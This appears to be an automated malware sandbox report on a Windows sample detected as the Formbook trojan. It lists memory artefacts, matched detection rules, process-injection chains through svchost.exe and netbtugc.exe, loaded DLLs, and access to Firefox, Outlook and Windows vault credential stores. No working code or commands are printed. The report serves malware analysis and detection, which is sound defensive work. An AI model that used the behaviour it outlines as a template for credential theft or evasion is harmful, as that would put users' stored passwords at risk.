Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0353FF09	4_2_0353FF09
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03443FD5	4_2_03443FD5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03443FD2	4_2_03443FD2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03481F92	4_2_03481F92
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0353FFB1	4_2_0353FFB1
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03489EB0	4_2_03489EB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03483D40	4_2_03483D40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03531D5A	4_2_03531D5A
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03537D73	4_2_03537D73
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0349FDC0	4_2_0349FDC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034F9C32	4_2_034F9C32
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0353FCF2	4_2_0353FCF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CB15E0	4_2_00CB15E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CAC7C7	4_2_00CAC7C7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CAC7D0	4_2_00CAC7D0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CAC9F0	4_2_00CAC9F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CAAA70	4_2_00CAAA70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CB30EE	4_2_00CB30EE
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CB30F0	4_2_00CB30F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CC9FD0	4_2_00CC9FD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0328A0AF	4_2_0328A0AF
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0328B9D6	4_2_0328B9D6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0328B8B4	4_2_0328B8B4
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0328BD6C	4_2_0328BD6C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0328ADD8	4_2_0328ADD8

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03775130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03787E54 appears 102 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0372B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 037BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 037AEA12 appears 86 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 034EEA12 appears 86 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 034C7E54 appears 111 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 0346B970 appears 280 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 034B5130 appears 58 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 034FF290 appears 105 times
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: String function: 00B48900 appears 42 times
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: String function: 00B40AE3 appears 70 times
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: String function: 00B27DE1 appears 36 times

Source: WBI835q8qr.exe, 00000000.00000003.1415477340.00000000032E3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs WBI835q8qr.exe
Source: WBI835q8qr.exe, 00000000.00000003.1412532352.00000000037ED000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs WBI835q8qr.exe

Source: WBI835q8qr.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3856343827.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3848509513.0000000000CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1567281464.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.3855901361.0000000003240000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3859655082.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3856117631.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1568187338.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1567707213.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@18/7

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B8A06A GetLastError,FormatMessageW,

0_2_00B8A06A

Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B781CB AdjustTokenPrivileges,CloseHandle,		0_2_00B781CB
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B787E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00B787E1

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B8B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00B8B3FB

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B9EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00B9EE0D

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B983BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_00B983BB

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B24E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00B24E89

Source: C:\Users\user\Desktop\WBI835q8qr.exe

File created: C:\Users\user\AppData\Local\Temp\aut6A46.tmp

Jump to behavior

Source: WBI835q8qr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: netbtugc.exe, 00000004.00000002.3849311944.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1750225937.0000000000E73000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3849311944.0000000000E93000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1751869566.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1750409999.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1751869566.0000000000E93000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: WBI835q8qr.exe	Virustotal: Detection: 69%
Source: WBI835q8qr.exe	ReversingLabs: Detection: 73%

Source: unknown	Process created: C:\Users\user\Desktop\WBI835q8qr.exe "C:\Users\user\Desktop\WBI835q8qr.exe"
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\WBI835q8qr.exe"
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\WBI835q8qr.exe"	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\WBI835q8qr.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: WBI835q8qr.exe

Static file information: File size 1195008 > 1048576

Source: WBI835q8qr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: WBI835q8qr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: WBI835q8qr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: WBI835q8qr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: WBI835q8qr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: WBI835q8qr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: WBI835q8qr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zERAQEwgaCWL.exe, 00000003.00000000.1493011603.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, zERAQEwgaCWL.exe, 00000008.00000000.1636664738.00000000003BE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: WBI835q8qr.exe, 00000000.00000003.1415477340.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, WBI835q8qr.exe, 00000000.00000003.1414963291.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1476278405.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1567745007.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1567745007.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1478027520.0000000003500000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857297581.0000000003440000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1570359057.0000000003293000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857297581.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1567667691.00000000030E7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: WBI835q8qr.exe, 00000000.00000003.1415477340.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, WBI835q8qr.exe, 00000000.00000003.1414963291.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1476278405.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1567745007.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1567745007.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1478027520.0000000003500000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.3857297581.0000000003440000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1570359057.0000000003293000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857297581.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1567667691.00000000030E7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.1567446257.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1536464194.000000000301A000.00000004.00000020.00020000.00000000.sdmp, zERAQEwgaCWL.exe, 00000003.00000003.1507157555.00000000016C5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.3849311944.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3859184553.0000000003A6C000.00000004.10000000.00040000.00000000.sdmp, zERAQEwgaCWL.exe, 00000008.00000002.3857301364.00000000029DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1856880731.00000000395FC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.3849311944.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3859184553.0000000003A6C000.00000004.10000000.00040000.00000000.sdmp, zERAQEwgaCWL.exe, 00000008.00000002.3857301364.00000000029DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1856880731.00000000395FC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.1567446257.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1536464194.000000000301A000.00000004.00000020.00020000.00000000.sdmp, zERAQEwgaCWL.exe, 00000003.00000003.1507157555.00000000016C5000.00000004.00000020.00020000.00000000.sdmp

Source: WBI835q8qr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: WBI835q8qr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: WBI835q8qr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: WBI835q8qr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: WBI835q8qr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B24B37 LoadLibraryA,GetProcAddress,

0_2_00B24B37

Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B48945 push ecx; ret	0_2_00B48958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004048A9 push esp; ret	2_2_004048AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E2BA push 00000038h; iretd	2_2_0041E2BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A436 push ebx; iretd	2_2_0041A600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418C92 pushad ; retf	2_2_00418C93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A5D9 push ebx; iretd	2_2_0041A600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004017E5 push ebp; retf 003Fh	2_2_004017E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403780 push eax; ret	2_2_00403782
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004147A2 push es; iretd	2_2_004147AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037309AD push ecx; mov dword ptr [esp], ecx	2_2_037309B6
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	Code function: 3_2_03503A40 push ebx; ret	3_2_03503A41
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	Code function: 3_2_0350EA8C push FFFFFFBAh; ret	3_2_0350EA8E
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	Code function: 3_2_035059ED push ebx; iretd	3_2_03505A14
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	Code function: 3_2_0350584A push ebx; iretd	3_2_03505A14
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	Code function: 3_2_035040A6 pushad ; retf	3_2_035040A7
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	Code function: 3_2_035096CE push 00000038h; iretd	3_2_035096D2
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	Code function: 3_2_034EFCBD push esp; ret	3_2_034EFCBE
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0344225F pushad ; ret	4_2_034427F9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034427FA pushad ; ret	4_2_034427F9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034709AD push ecx; mov dword ptr [esp], ecx	4_2_034709B6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0344283D push eax; iretd	4_2_03442858
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CB2238 pushad ; iretd	4_2_00CB2239
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CBAB37 push 00000038h; iretd	4_2_00CBAB3B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CB6CB3 push ebx; iretd	4_2_00CB6E7D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CB0EAB push ebp; retf	4_2_00CB0EAC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CB6E56 push ebx; iretd	4_2_00CB6E7D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00CB101F push es; iretd	4_2_00CB1027
